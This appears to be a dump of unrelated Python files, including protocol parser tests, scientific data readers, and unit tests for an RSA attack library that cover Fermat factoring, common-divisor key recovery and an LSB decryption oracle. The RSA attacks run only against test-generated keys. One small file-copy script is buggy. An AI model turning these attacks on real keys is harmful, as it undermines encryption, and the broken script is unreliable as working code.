pcp_message = pcpmessage.PcpMessage.parse('\x00', self.pcp_client_ip)
self.assertEqual(pcp_message, None)
def test_parse_pcp_message_supported_version_data_length_less_than_minimum(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common[:10], self.pcp_client_ip)
self.assertEqual(pcp_message, None)
def test_parse_pcp_message_data_length_not_multiplier_of_four(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_announce_common + '\x00', self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_message_data_length_greater_than_maximum(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_announce_common + '\x00' * 1100, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_request_map_invalid_data_length(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common + self.pcp_data_map[:10], self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_request_peer_invalid_data_length(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common + self.pcp_data_peer[:20], self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_request_unsupported_version(self):
self.pcp_data_request_announce_common = '\x01' + self.pcp_data_request_announce_common[1:]
pcp_message = pcpmessage.PcpMessage.parse(self.pcp_data_request_announce_common, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.UNSUPP_VERSION)
def test_parse_pcp_request_unsupported_opcode(self):
unsupported_opcode = '\x07'
self.pcp_data_request_announce_common = (self.pcp_data_request_announce_common[0] +
unsupported_opcode + self.pcp_data_request_announce_common[2:])
pcp_message = pcpmessage.PcpMessage.parse(self.pcp_data_request_announce_common, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.UNSUPP_OPCODE)
def test_parse_pcp_request_ip_address_mismatch(self):
pcp_message = pcpmessage.PcpMessage.parse(self.pcp_data_request_announce_common, "192.168.1.100")
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.ADDRESS_MISMATCH)
def test_parse_pcp_request_map_malformed_request(self):
# Non-zero lifetime, zero protocol, non-zero internal port
protocol = '\x00'
self.pcp_data_map = self.pcp_data_map[:12] + protocol + self.pcp_data_map[13:]
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common + self.pcp_data_map, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_request_map_unsupported_zero_internal_port(self):
internal_port = '\x00\x00'
self.pcp_data_map = self.pcp_data_map[:16] + internal_port + self.pcp_data_map[18:]
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common + self.pcp_data_map, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.UNSUPP_PROTOCOL)
def test_serialize_pcp_request_map(self):
fields = self.pcp_fields_request_map_common
fields.update(self.pcp_fields_map)
pcp_message = pcpmessage.PcpMessage(**fields)
expected_data = self.pcp_data_request_map_common + self.pcp_data_map
self.assertEqual(pcp_message.serialize(), expected_data)
def test_serialize_pcp_request_peer(self):
fields = self.pcp_fields_request_peer_common
fields.update(self.pcp_fields_peer)
pcp_message = pcpmessage.PcpMessage(**fields)
expected_data = self.pcp_data_request_peer_common + self.pcp_data_peer
self.assertEqual(pcp_message.serialize(), expected_data)
def test_serialize_pcp_request_announce(self):
pcp_message = pcpmessage.PcpMessage(**self.pcp_fields_request_announce_common)
expected_data = self.pcp_data_request_announce_common
self.assertEqual(pcp_message.serialize(), expected_data)
def test_serialize_pcp_response_map(self):
fields = self.pcp_fields_response_map_common
fields.update(self.pcp_fields_map)
pcp_message = pcpmessage.PcpMessage(**fields)
expected_data = self.pcp_data_response_map_common + self.pcp_data_map
self.assertEqual(pcp_message.serialize(), expected_data)
def test_serialize_pcp_response_unsuccessful_result_code_copy_pcp_client_ip_addr_part(self):
pcp_message = pcpmessage.PcpMessage(**self.pcp_fields_response_map_common)
pcp_message.update(self.pcp_fields_map)
pcp_message['pcp_client_ip'] = "192.168.1.1"
pcp_response_data = self.pcp_data_response_map_common[:len(self.pcp_data_response_map_common)-12]
pcp_response_data += '\x00\x00\x00\x00\x00\x00\xff\xff\xc0\xa8\x01\x01'
expected_data = pcp_response_data + self.pcp_data_map
self.assertEqual(pcp_message.serialize(), expected_data)
|
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
from neighborly.core.ecs import Component
from neighborly.plugins.default_plugin.character_values import CharacterValues
@dataclass(frozen=True)
class Activity:
"""Activities that a character can do at a location in the town
Attributes
----------
name: str
The name of the activity
traits_names: Tuple[str, ...]
Character values that associated with this activity
character_traits: CharacterValues
CharacterValues instance that encodes the list of trait_names
as a vector of 0's and 1's for non-applicable and applicable
character values respectively.
"""
name: str
trait_names: Tuple[str, ...]
character_traits: CharacterValues = field(init=False)
def __post_init__(self) -> None:
object.__setattr__(
self,
"character_traits",
CharacterValues({name: 1 for name in self.trait_names}, default=0),
)
_activity_registry: Dict[str, Activity] = {}
_activity_flags: Dict[str, int] = {}
def register_activity(activity: Activity) -> None:
"""Registers an activity instance for use in other places"""
next_flag = 1 << len(_activity_registry.keys())
_activity_registry[activity.name] = activity
_activity_flags[activity.name] = next_flag
def get_activity_flags(*activities: str) -> Tuple[int, ...]:
"""Return flags corresponding to given activities"""
return tuple([_activity_flags[activity] for activity in activities])
def get_activity(activity: str) -> Activity:
"""Return Activity instance corresponding to a given string"""
return _activity_registry[activity]
def get_all_activities() -> List[Activity]:
"""Return all activity instances in the registry"""
return list(_activity_registry.values())
class ActivityCenter(Component):
def __init__(self, activities: List[str]) -> None:
self.activities: List[str] = activities
self.activity_flags: int = 0
for activity in self.activities:
self.activity_flags |= get_activity_flags(activity)[0]
def has_flags(self, *flag_strs: str) -> bool:
flags = get_activity_flags(*flag_strs)
for flag in flags:
if self.activity_flags & flag == 0:
return False
return True
|
#!/bin/python
fAna = open("ana.csv", "r")
rTimes = list()
rDict = dict()
#print(prefix + ",benchmark,solve mem,solve time,drat kb,drat sec,lrat kb,lrat sec,restarts,decisions,conflicts,propagations,mark proof sec,dump lrat sec, ana sec, anamem mb")
for l in fAna:
data = l.split(",")
rDict.update({data[2]:float(data[4])})
fStd = open("std.csv", "r")
for l in fStd:
data = l.split(",")
sTime = float(data[3])
dTime = float(data[6])
print(str(rDict[data[2]]-sTime) + "," + str(dTime))
|
from setuptools import setup
setup(name='pyffe',
version='0.1',
description='Tools and utils for PyCaffe',
# url='http://github.com/fabiocarrara/pyffe',
author='Fabio Carrara',
author_email='fabio.carrara@isti.cnr.it',
license='MIT',
packages=['pyffe', 'pyffe.models'],
zip_safe=False,
requires=['functools32', 'tqdm', 'pandas', 'lmdb', 'caffe']
)
|
#!/usr/bin/python
file = open("copy_data_to_file.txt", "w")
while True:
text = input("Enter value: ")
if text == "CLOSE":
file.close()
break
if text == "SAVE":
for i in lines:
file.write(lines + "\n")
continue
else:
lines = file.readlines()
continue
|
from __future__ import division
import numpy as np
from numpy import log10
from scipy.interpolate import PchipInterpolator as interp1d
def seismic(f, ifo):
"""Seismic noise.
"""
return seismicAll(f, ifo)[0]
def seismicAll(f, ifo):
"""Seismic noise.
Return (noise, noise_vertical, noise_horizontal)
"""
hTable = ifo.Suspension.hTable
vTable = ifo.Suspension.vTable
theta = ifo.Suspension.VHCoupling.theta
# noise input, horizontal and vertical
if 'PlatformMotion' in ifo.Seismic:
if ifo.Seismic.PlatformMotion == 'BSC':
nt, nr = seisBSC(f)
elif ifo.Seismic.PlatformMotion == '6D':
nt, nr = seis6D(f)
else:
nt, nr = seisBSC(f)
else:
nt, nr = seisBSC(f)
# horizontal noise total
nh = (abs(hTable)**2) * nt**2
# vertical noise total
nv = (abs(theta * vTable)**2) * nt**2
# new total noise
n = nv + nh
# Convert into Strain PSD (4 TMs)
nh *= 4 * ifo.gwinc.dhdl_sqr
nv *= 4 * ifo.gwinc.dhdl_sqr
n *= 4 * ifo.gwinc.dhdl_sqr
return n, nh, nv
def seisBSC(f):
"""Rough ISI noise source spectra.
Returns ISI (translational, rotational) DOFs
"""
SEI_F = np.array([0.01, 0.03, 0.1, 0.2, 0.5, 1, 10, 30, 300])
# translational DOFs
SEI_T = np.array([3e-6, 1e-6, 2e-7, 2e-7, 8e-10, 1e-11, 3e-13, 3e-14, 3e-14])
nt = 10**(interp1d(SEI_F, log10(SEI_T))(f))
# rotational DOFs
SEI_R = np.array([1e-8, 3e-8, 2e-8, 1e-8, 4e-10, 1e-11, 3e-13, 3e-14, 3e-14])
nr = 10**(interp1d(SEI_F, log10(SEI_R))(f))
return nt, nr
def seis6D(f):
"""ISI noise source spectra with a 6D seismometer.
This largely follows Mow-Lowry and Martynov, arXiv:1801.01468.
"""
SEI_F = np.array([0.01, 0.03, 0.1, 0.2, 0.5, 1, 10, 100, 300])
SEI_T_self = np.array([1e-7, 1e-9, 3e-11, 6e-12, 3e-13, 1e-13, 3e-14, 1e-14, 1e-14])
nt_self = 10**(interp1d(SEI_F, log10(SEI_T_self))(f))
nt_gnd = 10*seisNLNM(f)
blend_t = np.abs(100/(1+1j*f/0.01)**4)
nt = np.sqrt(nt_self**2 + (blend_t * nt_gnd)**2)
SEI_R_self = np.array([2e-11, 5e-12, 1e-12, 6e-13, 3e-13, 2e-13, 6e-14, 2e-14, 2e-14])
nr_self = 10**(interp1d(SEI_F, log10(SEI_R_self))(f))
nr_gnd = np.abs(1e-7/(1+1j*f/0.001))
blend_r = np.abs(100/(1+1j*f/0.01)**4)
nr = np.sqrt(nr_self**2 + (blend_r * nr_gnd)**2)
return nt, nr
def seisNLNM(f):
"""The Peterson New Low-Noise Model.
Returns a displacement ASD.
"""
Pl = np.array([
1.00e-02, 1.00e-01, 1.70e-01, 4.00e-01, 8.00e-01, 1.24e+00,
2.40e+00, 4.30e+00, 5.00e+00, 6.00e+00, 1.00e+01, 1.20e+01,
1.56e+01, 2.19e+01, 3.16e+01, 4.50e+01, 7.00e+01, 1.01e+02,
1.54e+02, 3.28e+02, 6.00e+02, 1.00e+04])
Al = np.array([
-156.72, -162.36, -166.7 , -170. , -166.4 , -168.6 , -159.98,
-141.1 , -71.36, -97.26, -132.18, -205.27, -37.65, -114.37,
-160.58, -187.5 , -216.47, -185. , -168.34, -217.43, -258.28,
-346.88])
Bl = np.array([
5.64, 5.64, 0. , -8.3 , 28.9 , 52.48, 29.81,
0. , -99.77, -66.49, -31.57, 36.16, -104.33, -47.1 ,
-16.28, 0. , 15.7 , 0. , -7.61, 11.9 , 26.6 ,
48.75])
nlnm = 10**(np.interp(1/f, Pl, Al+Bl*np.log10(Pl))/20) / (2 * np.pi * f)**2
return nlnm
def seisNHNM(f):
"""The Peterson New High-Noise Model.
Returns a displacement ASD.
"""
Pl = np.array([
1.00e-01, 2.20e-01, 3.20e-01, 8.00e-01, 3.80e+00,
4.60e+00, 6.30e+00, 7.90e+00, 1.54e+01, 2.00e+01,
3.54e+02,
])
Al = np.array([
-108.73, -150.34, -122.31, -116.85, -108.48,
-74.66, 0.66, -93.37, 73.54, -151.52,
-206.66,
])
Bl = np.array([
-17.23, -80.50, -23.87, 32.51, 18.08,
-32.95, -127.18, -22.42, -162.98, 10.01,
31.63,
])
nhnm = 10**(np.interp(1/f, Pl, Al+Bl*np.log10(Pl))/20) / (2 * np.pi * f)**2
return nhnm
|
from bytemaps import sys
from bytemaps import Dataset
from bytemaps import Verify
from bytemaps import get_data
from bytemaps import ibits
from bytemaps import is_bad
from bytemaps import where
class ASCATAveraged(Dataset):
""" Read averaged ASCAT bytemaps. """
"""
Public data:
filename = name of data file
missing = fill value used for missing data;
if None, then fill with byte codes (251-255)
dimensions = dictionary of dimensions for each coordinate
variables = dictionary of data for each variable
"""
def __init__(self, filename, missing=-999.):
"""
Required arguments:
filename = name of data file to be read (string)
Optional arguments:
missing = fill value for missing data,
default is the value used in verify file
"""
self.filename = filename
self.missing = missing
Dataset.__init__(self)
# Dataset:
def _attributes(self):
return ['coordinates','long_name','units','valid_min','valid_max']
def _coordinates(self):
return ('variable','latitude','longitude')
def _shape(self):
return (4,720,1440)
def _variables(self):
return ['windspd','winddir','scatflag','radrain','sos',
'longitude','latitude','land','ice','nodata']
# _default_get():
def _get_index(self,var):
return {'windspd' : 0,
'winddir' : 1,
'rain' : 2,
'sos' : 3,
}[var]
def _get_scale(self,var):
return {'windspd' : 0.2,
'winddir' : 1.5,
'sos' : 0.02,
}[var]
# _get_ attributes:
def _get_long_name(self,var):
return {'windspd' : '10-m Surface Wind Speed',
'winddir' : '10-m Surface Wind Direction',
'scatflag' : 'Scatterometer Rain Flag',
'radrain' : 'Radiometer Rain Flag',
'sos' : 'Measured-Model Sum-of-Squares Residual',
'longitude' : 'Grid Cell Center Longitude',
'latitude' : 'Grid Cell Center Latitude',
'land' : 'Is this land?',
'ice' : 'Is this ice?',
'nodata' : 'Is there no data?',
}[var]
def _get_units(self,var):
return {'windspd' : 'm/s',
'winddir' : 'deg oceanographic',
'scatflag' : '0=no-rain, 1=rain',
'radrain' : '0=no-rain, -1=adjacent rain, >0=rain(mm/hr)',
'sos' : 'non-dimensional',
'longitude' : 'degrees east',
'latitude' : 'degrees north',
'land' : 'True or False',
'ice' : 'True or False',
'nodata' : 'True or False',
}[var]
def _get_valid_min(self,var):
return {'windspd' : 0.0,
'winddir' : 0.0,
'scatflag' : 0,
'radrain' : -1,
'sos' : 0.0,
'longitude' : 0.0,
'latitude' : -90.0,
'land' : False,
'ice' : False,
'nodata' : False,
}[var]
def _get_valid_max(self,var):
return {'windspd' : 50.0,
'winddir' : 360.0,
'scatflag' : 1,
'radrain' : 31,
'sos' : 5.0,
'longitude' : 360.0,
'latitude' : 90.0,
'land' : True,
'ice' : True,
'nodata' : True,
}[var]
# _get_ variables:
def _get_scatflag(self,var,bmap):
indx = self._get_index('rain')
scatflag = get_data(ibits(bmap,ipos=0,ilen=1),indx=indx)
bad = is_bad(get_data(bmap,indx=0))
scatflag[bad] = self.missing
return scatflag
def _get_radrain(self,var,bmap):
indx = self._get_index('rain')
radrain = get_data(ibits(bmap,ipos=1,ilen=1),indx=indx)
good = (radrain == 1)
radrain[~good] = self.missing
intrain = get_data(ibits(bmap,ipos=2,ilen=6),indx=indx)
nonrain = where(intrain == 0)
adjrain = where(intrain == 1)
hasrain = where(intrain > 1)
intrain[nonrain] = 0.0
intrain[adjrain] = -1.0
intrain[hasrain] = 0.2*(intrain[hasrain])-0.2
radrain[good] = intrain[good]
bad = is_bad(get_data(bmap,indx=0))
radrain[bad] = self.missing
return radrain
class ThreedayVerify(Verify):
""" Contains info for verification. """
def __init__(self,dataset):
self.filename = 'ascat_v02.1_averaged_verify.txt'
self.ilon1 = 170
self.ilon2 = 175
self.ilat1 = 274
self.ilat2 = 278
self.variables = ['windspd','winddir','scatflag','radrain']
self.startline = 16
self.columns = {'windspd' : 3,
'winddir' : 4,
'scatflag' : 5,
'radrain' : 6,
'sos' : 7}
dataset = set_verify_flags(dataset,self.variables)
Verify.__init__(self,dataset)
class WeeklyVerify(Verify):
""" Contains info for verification. """
def __init__(self,dataset):
self.filename = 'ascat_v02.1_averaged_verify.txt'
self.ilon1 = 170
self.ilon2 = 175
self.ilat1 = 274
self.ilat2 = 278
self.variables = ['windspd','winddir','scatflag','radrain']
self.startline = 49
self.columns = {'windspd' : 3,
'winddir' : 4,
'scatflag' : 5,
'radrain' : 6,
'sos' : 7}
dataset = set_verify_flags(dataset,self.variables)
Verify.__init__(self,dataset)
class MonthlyVerify(Verify):
""" Contains info for verification. """
def __init__(self,dataset):
self.filename = 'ascat_v02.1_averaged_verify.txt'
self.ilon1 = 170
self.ilon2 = 175
self.ilat1 = 274
self.ilat2 = 278
self.variables = ['windspd','winddir','scatflag','radrain']
self.startline = 83
self.columns = {'windspd' : 3,
'winddir' : 4,
'scatflag' : 5,
'radrain' : 6,
'sos' : 7}
dataset = set_verify_flags(dataset,self.variables)
Verify.__init__(self,dataset)
def set_verify_flags(dataset,variables):
for avar in variables:
if avar == 'mingmt': continue
dataset.variables[avar][dataset.variables['land']] = -555.
return dataset
if __name__ == '__main__':
""" Automated testing. """
# read 3-day averaged:
ascat = ASCATAveraged('ascat_20071022_v02.1_3day.gz')
if not ascat.variables: sys.exit('file not found')
# verify 3-day:
verify = ThreedayVerify(ascat)
if verify.success: print('successful verification for 3-day')
else: sys.exit('verification failed for 3-day')
print('')
# read weekly averaged:
ascat = ASCATAveraged('ascat_20071027_v02.1.gz')
if not ascat.variables: sys.exit('file not found')
# verify weekly:
verify = WeeklyVerify(ascat)
if verify.success: print('successful verification for weekly')
else: sys.exit('verification failed for weekly')
print('')
# read monthly averaged:
ascat = ASCATAveraged('ascat_200710_v02.1.gz')
if not ascat.variables: sys.exit('file not found')
# verify:
verify = MonthlyVerify(ascat)
if verify.success: print('successful verification for monthly')
else: sys.exit('verification failed for monthly')
print('')
print('all tests completed successfully')
print ('')
|
from typing import Tuple
from hypothesis import given
from ground.base import Context
from ground.hints import (Point,
Scalar)
from tests.utils import reverse_point_coordinates
from . import strategies
@given(strategies.contexts_with_points_and_scalars_pairs)
def test_basic(context_with_point_and_factors
: Tuple[Context, Point, Scalar, Scalar]) -> None:
context, point, factor_x, factor_y = context_with_point_and_factors
result = context.scale_point(point, factor_x, factor_y)
assert isinstance(result, context.point_cls)
@given(strategies.contexts_with_points_and_scalars_pairs)
def test_reversals(context_with_point_and_factors
: Tuple[Context, Point, Scalar, Scalar]) -> None:
context, point, factor_x, factor_y = context_with_point_and_factors
result = context.scale_point(point, factor_x, factor_y)
assert reverse_point_coordinates(result) == context.scale_point(
reverse_point_coordinates(point), factor_y, factor_x)
|
from binascii import hexlify
import pytest
from Cryptodome.Cipher import PKCS1_v1_5
from Cryptodome.PublicKey import RSA
from Cryptodome.Util.number import getPrime
from gmpy2 import mpz, next_prime, powmod
from hypothesis import assume, given, reject, settings
from hypothesis.strategies import integers, sampled_from, text
from cat.rsa.attacks import *
@pytest.fixture()
def key():
return RSA.generate(1024)
@pytest.fixture()
def close_primes():
p = getPrime(512)
q = int(next_prime(p))
return (p, q)
@pytest.fixture()
def plain_int():
return 512
def test_fermat_factoring(close_primes, plain_int):
p = close_primes[0]
q = close_primes[1]
plain = plain_int
e = 2 ** 16 + 1
pk = RSA.construct((p * q, e))
key = reconstruct_private(pk, p)
sk = fermat_factoring(pk)
cipher = powmod(plain, key.e, key.n)
assert int(powmod(cipher, sk.d, sk.n)) == plain
@given(integers(), integers(min_value=1))
@settings(deadline=None)
@pytest.mark.slow
def test_common_divisor(key, x, plain):
assume(0 < x < key.n)
assume(0 < plain < key.n)
sk = common_divisor(key.publickey(), key.p * x)
cipher = powmod(plain, key.e, key.n)
assert int(powmod(cipher, sk.d, sk.n)) == plain
def test_lsb_oracle_fix(key):
plain = 0xDEADBEEF
assert plain < key.n
d = mpz(key.d)
n = mpz(key.n)
def oracle(c):
return powmod(c, d, n) % 2
target = powmod(plain, key.e, key.n)
assert plain == lsb_oracle(key.publickey(), target, oracle)
@given(integers(min_value=1))
@settings(deadline=None)
@pytest.mark.slow
def test_lsb_oracle(key, plain):
assume(0 < plain < key.n)
d = mpz(key.d)
n = mpz(key.n)
def oracle(c):
return powmod(c, d, n) % 2
target = powmod(plain, key.e, key.n)
assert plain == lsb_oracle(key.publickey(), target, oracle)
|
from bs4 import BeautifulSoup
import re
def clean(raw_data):
if not isinstance(raw_data,str):
raw_data=str(raw_data)
review_text = BeautifulSoup(raw_data).get_text()
letters_only = re.sub("[^a-zA-Z]", " ", review_text)
words = letters_only.lower().split()
return( " ".join(words))
def concat_users_text(post):
return post.groupby(["thread_num","user"],sort=False)["text"].apply(lambda x: x.sum()).reset_index()
def get_users_in_game(role, concat_df):
return concat_df.merge(role,on=['thread_num','user'])
|
import prang
import os
import os.path
import pytest
from prang.validation import (
Name, Interleave, Element, EMPTY, ElementNode, QName, TEXT, After,
start_tag_close_deriv, after, interleave, children_deriv, text_deriv,
child_deriv, choice, NotAllowed, whitespace, Choice, OneOrMore,
start_tag_open_deriv, atts_deriv, one_or_more, strip_children_deriv,
group, nullable, end_tag_deriv, apply_after, flip)
from prang.simplification import PrangException
from functools import partial
def test_children_deriv_interleave():
schema = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
doc = tuple()
deriv = children_deriv(schema, ('',))
assert str(children_deriv(schema, doc)) == str(deriv)
x = child_deriv(schema, '')
print("x is", x)
deriv = choice(schema, x) if whitespace('') else x
assert str(children_deriv(schema, '')) == str(deriv)
deriv = text_deriv(schema, '')
assert str(child_deriv(schema, '')) == str(deriv)
p1 = Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT)
p2 = EMPTY
deriv = After(text_deriv(p1, ''), p2)
assert str(text_deriv(schema, '')) == str(deriv)
p11 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
p12 = TEXT
deriv = choice(
interleave(text_deriv(p11, ''), p12),
interleave(p11, text_deriv(p12, '')))
assert str(text_deriv(p1, '')) == str(deriv)
deriv = NotAllowed()
assert str(text_deriv(p11, '')) == str(deriv)
deriv = NotAllowed()
assert str(interleave(NotAllowed(), p12)) == str(deriv)
deriv = TEXT
assert str(text_deriv(p12, '')) == str(deriv)
assert whitespace('') is True
schema = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
deriv = Choice(
After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY),
After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY))
print('is', children_deriv(schema, doc))
print('should be', deriv)
assert str(children_deriv(schema, doc)) == str(deriv)
def test_start_tag_close_interleave():
p1 = Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT)
p2 = EMPTY
schema = After(
p1,
p2)
deriv = after(start_tag_close_deriv(p1), p2)
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = p1
p11 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
p12 = TEXT
deriv = interleave(start_tag_close_deriv(p11), start_tag_close_deriv(p12))
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = p11
deriv = schema
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = p12
deriv = schema
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = p2
deriv = schema
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
deriv = schema
assert str(start_tag_close_deriv(schema)) == str(deriv)
def test_start_tag_close_simple():
schema = After(
EMPTY,
EMPTY)
deriv = After(EMPTY, EMPTY)
assert str(start_tag_close_deriv(schema)) == str(deriv)
def test_atts_deriv_interleave():
schema = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
deriv = schema
doc = tuple()
assert str(atts_deriv(schema, doc)) == str(deriv)
def test_atts_deriv():
schema = After(
EMPTY,
EMPTY)
doc = tuple()
deriv = schema
assert str(atts_deriv(schema, doc)) == str(deriv)
def test_contains():
schema = Name({'ns': ''}, 'foo')
doc = QName('', 'foo')
assert prang.validation.contains(schema, doc) is True
def test_start_tag_open_deriv():
schema = Element(
Name({'ns': ''}, 'foo'), EMPTY)
doc = QName('', 'foo')
deriv = After(
EMPTY,
EMPTY)
assert str(start_tag_open_deriv(schema, doc)) == str(deriv)
def test_start_tag_open_deriv_interleave():
schema = Element(
Name({'ns': ''}, 'foo'),
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT))
doc = QName('', 'foo')
deriv = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
assert str(start_tag_open_deriv(schema, doc)) == str(deriv)
def test_interleave():
schema = Element(
Name({'ns': ''}, 'foo'),
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT))
doc = ElementNode(QName('', 'foo'), tuple(), tuple())
assert str(child_deriv(schema, doc)) == str(NotAllowed())
def test_start_tag_open_deriv_one_or_more():
schema = Element(
Name({'ns': ''}, 'foo'),
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))))
doc = QName('', 'foo')
p2 = Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)))
deriv = After(p2, EMPTY)
assert str(start_tag_open_deriv(schema, doc)) == str(deriv)
def test_atts_deriv_one_or_more():
schema = After(
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))),
EMPTY)
doc = ()
deriv = schema
assert str(atts_deriv(schema, doc)) == str(deriv)
def test_start_tag_close_deriv_one_or_more():
schema = After(
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))),
EMPTY)
p1 = Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)))
p2 = EMPTY
deriv = after(start_tag_close_deriv(p1), p2)
assert str(start_tag_close_deriv(schema)) == str(deriv)
p11 = EMPTY
p12 = OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))
deriv = choice(start_tag_close_deriv(p11), start_tag_close_deriv(p12))
assert str(start_tag_close_deriv(p1)) == str(deriv)
deriv = EMPTY
assert str(start_tag_close_deriv(p11)) == str(deriv)
p121 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
deriv = one_or_more(start_tag_close_deriv(p121))
assert str(start_tag_close_deriv(p12)) == str(deriv)
deriv = p121
assert str(start_tag_close_deriv(p121)) == str(deriv)
deriv = After(
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))),
EMPTY)
assert str(start_tag_close_deriv(schema)) == str(deriv)
def test_one_or_more_children_deriv():
schema = After(
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))),
EMPTY)
doc = ('x', ElementNode(QName('', 'bar'), tuple(), ()))
deriv = strip_children_deriv(schema, doc)
assert str(children_deriv(schema, doc)) == str(deriv)
x = child_deriv(schema, 'x')
y = child_deriv(x, doc[1])
assert str(strip_children_deriv(schema, doc)) == str(y)
deriv = text_deriv(schema, 'x')
assert str(child_deriv(schema, 'x')) == str(deriv)
p1 = Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)))
p2 = EMPTY
deriv = after(text_deriv(p1, 'x'), p2)
assert str(text_deriv(schema, 'x')) == str(deriv)
p11 = EMPTY
p12 = OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))
deriv = choice(text_deriv(p11, 'x'), text_deriv(p12, 'x'))
assert str(text_deriv(p1, 'x')) == str(deriv)
assert str(text_deriv(p11, 'x')) == str(NotAllowed())
p121 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
deriv = group(text_deriv(p121, 'x'), choice(OneOrMore(p121), EMPTY))
assert str(text_deriv(p12, 'x')) == str(deriv)
assert str(text_deriv(p121, 'x')) == str(NotAllowed())
def test_group():
assert str(group(NotAllowed(), EMPTY)) == str(NotAllowed())
def test_one_or_more():
schema = Element(
Name({'ns': ''}, 'foo'),
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))))
doc = ElementNode(
QName('', 'foo'), tuple(), (
'x', ElementNode(QName('', 'bar'), tuple(), ())))
assert str(child_deriv(schema, doc)) == str(NotAllowed())
def test_one_or_more_multiple():
schema = Element(
Name({'ns': ''}, 'foo'),
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)))
doc = ElementNode(
QName('', 'foo'), (), (
ElementNode(QName('', 'bar'), (), ()),
ElementNode(QName('', 'bar'), (), ()),
ElementNode(QName('', 'bar'), (), ())))
qn = QName('', 'foo')
d1 = start_tag_open_deriv(schema, qn)
m1 = After(
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)),
EMPTY)
assert str(d1) == str(m1)
atts = ()
d2 = atts_deriv(d1, atts)
m2 = m1
assert str(d2) == str(m2)
d3 = start_tag_close_deriv(d2)
m21 = OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))
m211 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
m22 = EMPTY
m3_1 = after(start_tag_close_deriv(m21), m22)
assert str(m3_1) == str(d3)
m3_2 = after(start_tag_close_deriv(m21), EMPTY)
assert str(m3_2) == str(d3)
m3_3 = after(one_or_more(start_tag_close_deriv(m211)), EMPTY)
assert str(m3_3) == str(d3)
m3_4 = after(one_or_more(m211), EMPTY)
m3_4 = After(OneOrMore(m211), EMPTY)
m3_4 = After(
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)),
EMPTY)
assert str(d3) == str(m3_4)
children = (
ElementNode(QName('', 'bar'), (), ()),
ElementNode(QName('', 'bar'), (), ()),
ElementNode(QName('', 'bar'), (), ()))
d4 = children_deriv(d3, children)
m4_1 = children_deriv(m3_4, children)
assert str(d4) == str(m4_1)
m4_2 = strip_children_deriv(m3_4, children)
assert str(d4) == str(m4_2)
child_0 = ElementNode(QName('', 'bar'), (), ())
m4_3 = child_deriv(m3_4, child_0)
child_0_qn = QName('', 'bar')
